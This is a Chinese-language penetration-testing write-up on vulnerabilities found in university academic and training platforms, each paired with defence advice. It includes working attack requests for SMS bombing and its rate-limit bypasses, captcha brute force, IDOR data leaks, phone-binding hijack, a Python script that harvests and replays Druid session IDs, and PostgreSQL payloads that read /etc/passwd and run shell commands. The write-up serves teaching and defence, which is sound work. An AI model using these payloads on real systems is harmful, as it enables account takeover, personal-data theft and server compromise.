高校渗透测试实战：从漏洞挖掘到防御体系建设

1. 高校渗透测试实战：从基础漏洞到系统接管的完整路径

在最近一次高校系统的安全评估中，我发现了多个典型的安全漏洞，这些案例非常适合作为网络安全新手的入门教材。不同于复杂的APT攻击，这些漏洞利用门槛低、重现性强，却能造成严重的实际危害。下面我将按照漏洞发现的先后顺序，详细解析每个漏洞的发现过程、利用方法以及背后的安全原理。

1.1 教务系统短信轰炸漏洞剖析

漏洞发现过程：
在测试某高校教务系统时，我注意到登录界面除了常规的账号密码登录外，还提供了手机验证码登录选项。这种双因素认证本应提升安全性，但实现不当反而会成为攻击入口。

技术原理深度解析：
正常的短信验证流程应该满足以下安全要求：

1. 验证码生成与校验必须在服务端完成
2. 每个验证码只能使用一次且有时效限制
3. 同一手机号的发送频率必须受到严格控制

但在该系统中，我发现验证流程被拆分成了两个独立的HTTP请求：

http复制POST /verify/code_check HTTP/1.1
Content-Type: application/json

{"code":"123456"}

http复制POST /sms/send HTTP/1.1 
Content-Type: application/json

{"phone":"13800138000"}

这种设计上的分离导致攻击者可以：

1. 先发送合法验证码通过第一个接口验证
2. 拦截第二个短信发送请求进行重放攻击
3. 通过Burp Repeater模块无限次重放发送请求

实战绕过技巧扩展：
除了基本的重放攻击外，在实际渗透测试中我还发现以下几种绕过限制的方法：

1. 空格填充绕过：

http复制POST /sms/send HTTP/1.1
Content-Type: application/json

{"phone":" 13800138000"}  // 注意phone前的空格

• 原理：后端去空格处理不严谨，将带空格的号码视为新号码
• 利用：使用Burp Intruder的Payload Positions设置空格增量

2. 多号码拼接攻击：

http复制POST /sms/send HTTP/1.1
Content-Type: application/json

{"phone":"13800138000,13900139000"}

• 效果：单次请求可向多个号码发送相同验证码
• 危害：攻击者可同时获取目标用户的验证码

3. 请求头伪造：

http复制POST /sms/send HTTP/1.1
X-Forwarded-For: 192.168.1.1
X-Real-IP: 192.168.1.1

• 作用：绕过基于IP的频次限制
• 技巧：配合代理池轮询使用效果更佳

防御方案建议：

1. 合并验证码校验和短信发送接口
2. 实现令牌桶算法控制发送频率
3. 增加图形验证码二次验证
4. 对异常发送行为进行日志审计和告警

1.2 实训平台用户体系全面沦陷

漏洞链分析：
该实训平台存在一系列逻辑漏洞，形成了完整的攻击链：

1. 任意用户注册 → 2. 验证码爆破 → 3. 密码修改 → 4. 账户接管

验证码设计缺陷：
平台验证码存在两个致命问题：

1. 验证码位数不足（仅4位数字）
2. 未做失败次数限制

通过Burp Intruder进行暴力破解：

http复制POST /api/login HTTP/1.1
Content-Type: application/json

{
  "username":"test",
  "password":"123456",
  "captcha":"§0000§"
}

设置Payload类型为Numbers，范围0000-9999，步长1，约15分钟即可完成全量爆破。

批量注册漏洞利用：
更严重的是注册接口存在参数污染漏洞：

http复制GET /api/send_register_code?phone=13800138000,13900139000

这种设计导致：

1. 单次请求可向多个号码发送相同验证码
2. 攻击者无需知晓目标手机号收到的验证码
3. 可批量注册大量虚假账号

密码修改逻辑缺陷：
密码修改流程未验证原密码，仅校验短信验证码。结合验证码爆破漏洞，可实现：

1. 枚举有效用户名（通过登录错误提示）
2. 爆破对应手机号的验证码
3. 直接修改账户密码

安全加固建议：

1. 验证码升级为6位且包含字母
2. 同一手机号每日最多发送5次验证码
3. 密码修改必须验证原密码+短信验证码
4. 增加行为验证码（如滑动拼图）

2. 越权漏洞深度利用与防御

2.1 教职工信息泄露漏洞

漏洞发现过程：
在测试登录记录查询功能时，发现接口：

http复制POST /api/login_log HTTP/1.1
Content-Type: application/json

{"userid":"12345"}

通过参数变异测试发现：

• 修改为其他数字 → 返回权限不足
• 修改为null → 返回部分记录
• 修改为* → 返回全部记录

SQL注入痕迹分析：
从响应时间变化（正常200ms，异常800ms）推测后端SQL可能为：

sql复制SELECT * FROM login_log 
WHERE userid = ${input} 
ORDER BY time DESC LIMIT 10

当input为*时，可能被解析为：

sql复制SELECT * FROM login_log 
WHERE userid LIKE '%'

信息泄露危害：
获取的教职工数据包含：

• 身份证号（18位+校验位）
• 工资卡号（部分银行账号）
• 家庭住址（精确到门牌号）
• 联系方式（手机+座机）

这些数据可被用于：

1. 精准钓鱼攻击
2. 撞库攻击其他系统
3. 社会工程学攻击

2.2 手机号劫持漏洞

漏洞利用链：

1. 正常流程：原手机验证 → 新手机验证 → 修改绑定
2. 漏洞流程：拦截第一个请求修改手机号 → 跳过原手机验证

关键请求分析：

http复制POST /api/change_phone_step1 HTTP/1.1
Content-Type: application/json

{
  "old_phone":"13800138000",
  "new_phone":"13900139000",
  "code":"123456"
}

绕过技巧：

1. 修改old_phone为目标号码
2. 修改new_phone为自己号码
3. 获取验证码后，在step2请求中同时修改两个手机号参数

防御方案：

1. 绑定流程加入CSRF Token
2. 关键操作进行二次确认
3. 记录修改日志并短信通知

3. 系统级漏洞利用实战

3.1 Druid未授权访问+Session劫持

漏洞复现路径：

1. 发现Druid监控页面：/druid/index.html
2. 访问Session监控：/druid/session.html
3. 导出活跃Session到文本文件
4. 使用Yakit进行Session替换测试

自动化利用脚本：

python复制import requests
from bs4 import BeautifulSoup

def extract_sessions(url):
    resp = requests.get(f"{url}/druid/session.json")
    sessions = []
    for item in resp.json()['Content']:
        sessions.append(item['SESSIONID'])
    return sessions

def session_hijack(target_url, session_id):
    headers = {'Cookie': f'JSESSIONID={session_id}'}
    resp = requests.get(target_url, headers=headers)
    return 'logout' in resp.text  # 检测登录状态

防御建议：

1. 修改Druid默认路径
2. 配置访问白名单
3. 启用强鉴权机制

3.2 SQL注入到RCE的完整利用

漏洞发现过程：
在浏览JS文件时发现接口：

javascript复制$.post('/api/query', {
  sql: "SELECT * FROM users WHERE id=1"
})

注入点验证：

http复制POST /api/query HTTP/1.1
Content-Type: application/json

{"sql":"SELECT version()"}

PostgreSQL特性利用：

1. 文件读取：

sql复制SELECT pg_read_file('/etc/passwd')

2. 命令执行：

sql复制COPY (SELECT 'echo "test" > /tmp/test') 
TO PROGRAM '/bin/bash'

完整利用链：

1. 获取数据库版本：SELECT version()
2. 列出扩展：SELECT * FROM pg_available_extensions
3. 启用命令执行扩展：CREATE EXTENSION IF NOT EXISTS "plperlu"
4. 执行系统命令：SELECT plperlu.do_system('id')

防御方案：

1. 使用PreparedStatement
2. 最小权限原则
3. 禁用危险扩展

4. 渗透测试方法论总结

4.1 漏洞挖掘基础流程

1. 信息收集阶段：

   • 子域名枚举（assetnote、subfinder）
   • 端口扫描（naabu、nmap）
   • 目录爆破（dirsearch、feroxbuster）

2. 漏洞探测阶段：

   • 自动化扫描（nuclei、vscan）
   • 手动测试（Burp Suite手工测试）
   • 业务逻辑分析（业务流程逆向）

3. 漏洞利用阶段：

   • 漏洞验证（PoC构造）
   • 权限提升（横向移动）
   • 持久化维持（后门植入）

4.2 新手快速入门建议

学习路线图：

1. 基础网络知识（TCP/IP、HTTP协议）
2. 常见漏洞原理（OWASP Top 10）
3. 工具使用（Burp Suite、Nmap）
4. 靶场练习（DVWA、vulnhub）

实战技巧：

1. 关注参数传递方式（GET/POST/JSON）
2. 检查每个输入点的数据处理
3. 观察响应时间和长度差异
4. 尝试非常规输入（null、数组、特殊字符）

法律红线提醒：

1. 必须获得书面授权
2. 不得进行破坏性测试
3. 严格保密发现结果
4. 及时提交漏洞报告

5. 防御体系建设建议

5.1 基础安全防护

1. 输入验证：

   • 白名单过滤
   • 数据类型校验
   • 长度限制

2. 会话管理：

   • 安全的Cookie属性（HttpOnly、Secure）
   • Session固定防护
   • 登录超时设置

3. 权限控制：

   • RBAC模型
   • 最小权限原则
   • 操作日志审计

5.2 高级防御措施

1. WAF配置：

   • SQL注入规则
   • XSS防护
   • 速率限制

2. 监控预警：

   • 异常行为检测
   • 敏感操作告警
   • 日志集中分析

3. 安全开发：

   • SDL流程
   • 代码审计
   • 漏洞扫描

在实际渗透测试过程中，我发现大多数高校系统漏洞都源于基础安全措施的缺失。通过系统性地实施上述防御方案，可以阻断90%以上的常见攻击。对于安全团队来说，定期进行红蓝对抗演练，持续优化防御体系，才是保障系统安全的根本之道。